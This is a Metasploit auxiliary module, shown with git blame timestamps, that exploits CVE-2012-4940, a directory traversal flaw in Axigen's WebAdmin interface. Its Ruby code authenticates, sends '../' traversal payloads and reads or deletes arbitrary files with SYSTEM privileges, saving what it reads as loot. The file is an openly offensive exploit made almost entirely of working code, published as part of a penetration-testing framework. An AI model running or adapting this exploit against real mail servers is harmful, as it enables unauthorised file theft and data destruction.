2013-03-13 10:52:54 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-03-13 10:52:54 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Axigen Arbitrary File Read and Delete',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a directory traversal vulnerability in the WebAdmin
|
|
|
|
interface of Axigen, which allows an authenticated user to read and delete
|
|
|
|
arbitrary files with SYSTEM privileges. The vulnerability is known to work on
|
|
|
|
Windows platforms. This module has been tested successfully on Axigen 8.10 over
|
|
|
|
Windows 2003 SP2.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Zhao Liang', # Vulnerability discovery
|
|
|
|
'juan vazquez' # Metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'US-CERT-VU', '586556' ],
|
|
|
|
[ 'CVE', '2012-4940' ],
|
|
|
|
[ 'OSVDB', '86802' ]
|
|
|
|
],
|
|
|
|
'Actions' =>
|
|
|
|
[
|
|
|
|
['Read', { 'Description' => 'Read remote file' }],
|
|
|
|
['Delete', { 'Description' => 'Delete remote file' }]
|
|
|
|
],
|
|
|
|
'DefaultAction' => 'Read',
|
|
|
|
'DisclosureDate' => 'Oct 31 2012'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(9000),
|
|
|
|
OptInt.new('DEPTH', [ true, 'Traversal depth if absolute is set to false', 4 ]),
|
|
|
|
OptString.new('TARGETURI',[ true, 'Path to Axigen WebAdmin', '/' ]),
|
|
|
|
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
|
|
|
|
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
|
|
|
|
OptString.new('PATH', [ true, 'The file to read or delete', "\\boot.ini" ])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2013-12-03 18:58:16 +00:00
|
|
|
print_status("#{peer} - Trying to login")
|
2013-08-30 21:28:54 +00:00
|
|
|
if login
|
2013-12-03 18:58:16 +00:00
|
|
|
print_good("#{peer} - Login successful")
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
2013-12-03 18:58:16 +00:00
|
|
|
print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
|
2013-08-30 21:28:54 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
@traversal = "../" * 10
|
|
|
|
file = datastore['PATH']
|
|
|
|
@platform = get_platform
|
|
|
|
|
|
|
|
if @platform == 'windows'
|
|
|
|
@traversal.gsub!(/\//, "\\")
|
|
|
|
file.gsub!(/\//, "\\")
|
|
|
|
else # unix
|
2013-12-03 18:58:16 +00:00
|
|
|
print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows")
|
2013-08-30 21:28:54 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
case action.name
|
|
|
|
when 'Read'
|
|
|
|
read_file(datastore['PATH'])
|
|
|
|
when 'Delete'
|
|
|
|
delete_file(datastore['PATH'])
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def read_file(file)
|
|
|
|
|
2013-12-03 18:58:16 +00:00
|
|
|
print_status("#{peer} - Retrieving file contents...")
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => normalize_uri(target_uri.path, "sources", "logging", "page_log_file_content.hsp"),
|
|
|
|
'method' => 'GET',
|
|
|
|
'cookie' => "_hadmin=#{@session}",
|
|
|
|
'vars_get' => {
|
|
|
|
'_h' => @token,
|
|
|
|
'fileName' => "#{@traversal}#{file}"
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0
|
|
|
|
store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file)
|
2013-12-03 18:58:16 +00:00
|
|
|
print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
2013-12-03 18:58:16 +00:00
|
|
|
print_error("#{peer} - Failed to retrieve file")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def delete_file(file)
|
2013-12-03 18:58:16 +00:00
|
|
|
print_status("#{peer} - Deleting file #{file}")
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => normalize_uri(target_uri.path),
|
|
|
|
'method' => 'GET',
|
|
|
|
'cookie' => "_hadmin=#{@session}",
|
|
|
|
'vars_get' => {
|
|
|
|
'_h' => @token,
|
|
|
|
'page' => 'vlf',
|
|
|
|
'action' => 'delete',
|
|
|
|
'fileName' => "#{@traversal}#{file}"
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
if res and res.code == 200 and res.body =~ /View Log Files/
|
2013-12-03 18:58:16 +00:00
|
|
|
print_good("#{peer} - File #{file} deleted")
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
2013-12-03 18:58:16 +00:00
|
|
|
print_error("#{peer} - Error deleting file #{file}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_platform
|
2013-12-03 18:58:16 +00:00
|
|
|
print_status("#{peer} - Retrieving platform")
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => normalize_uri(target_uri.path),
|
|
|
|
'method' => 'GET',
|
|
|
|
'cookie' => "_hadmin=#{@session}",
|
|
|
|
'vars_get' => {
|
|
|
|
'_h' => @token
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
if res and res.code == 200
|
|
|
|
if res.body =~ /Windows/
|
2013-12-03 18:58:16 +00:00
|
|
|
print_good("#{peer} - Windows platform found")
|
2013-08-30 21:28:54 +00:00
|
|
|
return 'windows'
|
|
|
|
elsif res.body =~ /Linux/
|
2013-12-03 18:58:16 +00:00
|
|
|
print_good("#{peer} - Linux platform found")
|
2013-08-30 21:28:54 +00:00
|
|
|
return 'unix'
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2013-12-03 18:58:16 +00:00
|
|
|
print_warning("#{peer} - Platform not found, assuming UNIX flavor")
|
2013-08-30 21:28:54 +00:00
|
|
|
return 'unix'
|
|
|
|
end
|
|
|
|
|
|
|
|
def login
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => normalize_uri(target_uri.path),
|
|
|
|
'method' => 'POST',
|
|
|
|
'vars_post' => {
|
|
|
|
'username' => datastore['USERNAME'],
|
|
|
|
'password' => datastore['PASSWORD'],
|
|
|
|
'submit' => 'Login',
|
|
|
|
'action' => 'login'
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
if res and res.code == 303 and res.headers['Location'] =~ /_h=([a-f0-9]*)/
|
|
|
|
@token = $1
|
|
|
|
if res.headers['Set-Cookie'] =~ /_hadmin=([a-f0-9]*)/
|
|
|
|
@session = $1
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
return false
|
|
|
|
end
|
2013-03-13 10:52:54 +00:00
|
|
|
|
|
|
|
end
|